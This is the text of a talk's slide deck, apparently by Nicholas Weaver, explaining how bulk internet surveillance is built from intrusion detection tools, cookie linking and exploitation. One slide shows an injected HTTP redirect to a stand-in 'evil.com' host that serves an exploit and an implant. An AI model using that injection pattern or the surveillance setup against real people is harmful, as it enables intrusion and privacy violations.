The Golden Age of Bulk Surveillance Nicholas C Weaver
About Me...
The Golden Age of Internet Surveillance Nicholas Weaver
LITE TOP SECRET//SI//REL TO USA, FVEY
Not NOBUS (Nobody But Us)
(Image: US Navy Photograph)
Not About Needles In Haystacks
(Image: Wikimedia Photo)
Not About Connecting the Dots
Drift Nets to Create Metadata
[Diagram labels: HTTP Request (URL: X, Is an iPhone?); .doc file (Author X); Spotted .onion URL; PGP message (key: X); Mojahadeen Secrets (key: X)]
(Image: José Ramón García Ares for Wikipedia)
Pulling Threads To Get Results
(Image: Wikimedia Photo)
A Thread To Pull: Watching an IRC Chat
OtherDude: Hey, did you see
OtherDude: http://www.bbc.com/news/world-us-canada-16330396?
AnonDude: hmmm...
AnonDude: HAHAH, that's pretty funny!
Intercept captured 12/30/2011 11:32 GMT
Step 1: "Use SIGINT" (Signals Intelligence)/DNI (Digital Network Intelligence): Enables identification of AnonDude and developing a "pattern of life" for his online behavior
Step 2: "Use CNE" (Computer Network Exploitation): After identification, invoke "exploit by name" to take over AnonDude's computer
Start With Your Wiretaps...
How They Work: Scalable Network Intrusion Detection Systems
[Diagram: Tap -> High Volume Filter (Is Not BitTorrent?) -> Load Balancer, H(SIP, DIP) -> NIDS Node, NIDS Node, NIDS Node]
• Do this in OpenFlow: 100 Gbps installs already done
• Linear Scaling: 10x the money... 10x the bandwidth!
• 1u gives 1-5 Gbps
Inside the NIDS
[Diagram: fragmented traffic on the wire and the record the NIDS extracts from it]
Traffic: GET HT TP /fu bar/ 1.1..
Parsed: HTTP Request, URL = /fubar/, Host = ....
Traffic: GET HTTP /b az/?id= 1f413 1.1...
Parsed: HTTP Request, URL = /baz/?id=..., ID = 1f413
Traffic: 220 mail.domain.target ESMTP Sendmail...
Parsed: Sendmail, From = someguy@..., To = otherguy@...
Unlike conventional NIDS you don't worry about evasion: Anyone who wants to evade uses cryptography instead
Which NIDS To Use?
• Bro Network Security Monitor (BSD license)
  • Includes a robust suite of protocol parsers
  • Realtime operation, invokes Bro policy scripts
  • Requires seeing both sides of the traffic
• Lockheed/Martin Vortex (GPL)
  • Only handles the reassembly: Network traffic to files, then invoke separate parser programs
  • Near real-time operation
• Eagle GLINT by Nexa Technologies
  • Formerly Amesys (was part of Bull)
  • Commercial "Intelligence" interception package
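Added example, not from the slides: the load balancer's H(SIP, DIP) has to be order-independent if a node running Bro is to see both sides of the traffic, and this sketch compares a directional hash with a symmetric one. The function names, the use of SHA-256 and the sample flows are assumptions made for illustration.

```python
import hashlib
import ipaddress

def directional_node(src_ip, dst_ip, n_nodes):
    """Naive H(SIP, DIP): hashes the address pair in packet order."""
    key = ipaddress.ip_address(src_ip).packed + ipaddress.ip_address(dst_ip).packed
    return int.from_bytes(hashlib.sha256(key).digest()[:8], "big") % n_nodes

def symmetric_node(src_ip, dst_ip, n_nodes):
    """Order-independent H(SIP, DIP): sort the two addresses before hashing."""
    lo, hi = sorted((ipaddress.ip_address(src_ip).packed,
                     ipaddress.ip_address(dst_ip).packed))
    return int.from_bytes(hashlib.sha256(lo + hi).digest()[:8], "big") % n_nodes

def split_flows(flows, n_nodes, picker):
    """Count flows whose two directions land on different NIDS nodes."""
    return sum(1 for s, d in flows
               if picker(s, d, n_nodes) != picker(d, s, n_nodes))

def node_load(flows, n_nodes, picker):
    """Flows assigned to each node, to check that the spread is even."""
    load = [0] * n_nodes
    for s, d in flows:
        load[picker(s, d, n_nodes)] += 1
    return load

# Constructed sample flows (not captured traffic): 1000 client/server pairs.
SAMPLE_FLOWS = [(f"10.0.{i // 250}.{i % 250 + 1}", f"198.51.100.{i % 200 + 1}")
                for i in range(1000)]

if __name__ == "__main__":
    n = 4  # number of NIDS nodes behind the load balancer
    print("directional, split flows:", split_flows(SAMPLE_FLOWS, n, directional_node))
    print("symmetric, split flows:  ", split_flows(SAMPLE_FLOWS, n, symmetric_node))
    print("symmetric, load per node:", node_load(SAMPLE_FLOWS, n, symmetric_node))
```

A split flow means the request and the reply are reassembled on different nodes, so neither node can pair them.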
Tracking People Not Machines: User Identification
Tracking People, Not Machines: Cookie Linking
Bulk Recording
Federated Search
[Diagram label, repeated four times: Who Viewed This Page?]
Query Focused Centralized Datasets
[Diagram: three copies of one record, labelled Username, IP and Cookie]
Site: arstechnica.com
Username: broidsrocks
Cookie: 223e77...
From IP: 10.271.13.1
Seen: 2012-12-01 07:32:24
Use SIGINT
[Diagram labels: BBC Pageview; AnonDude is...; AnonDude's House; Double-click Ad; Linked User IDs; "IP Intelligence"; IP Activity History (unmasked VPNs)]
Computer Network Exploitation
[Diagram: HTTP messages shown on the slide]
GET /script.js HTTP/1.1, host: www.targetdomain.com, cookie: id=iamavictim
HTTP 302 FOUND, location: http://www.evil.com/pwnme.js
GET /pwnme.js HTTP/1.1, host: www.evil.com
HTTP 200 OK .....
Here's an exploit...
GET /theimplant HTTP/1.1, host: www.evil.com
HTTP 200 OK ....
[Labels: AirPwn - Goatse; HackingTeam; FinFisher; Black Market RATs; Metasploit; NSA]
(Images: Eagle from the EFF; Rat from OpenClipart)
Put It In Action: Running on the "Cylon" Network
• Intel NUC computer
• DualComm Gbps Tap
• $836.37
• connect to http://basestar.local to access the UI
A Canned Demo...
This is Hobby Stuff...
(Image: Wikipedia (Tobias Grosch))
So Who Are Your Friends?
(Image: From amcharts.com)
So What Now? Go Dark
Because What's The Opposite Of NOBUS?
• Upcoming UC Berkeley CS 194 (Practical Networking) project #2: Build an NSA style surveillance suite...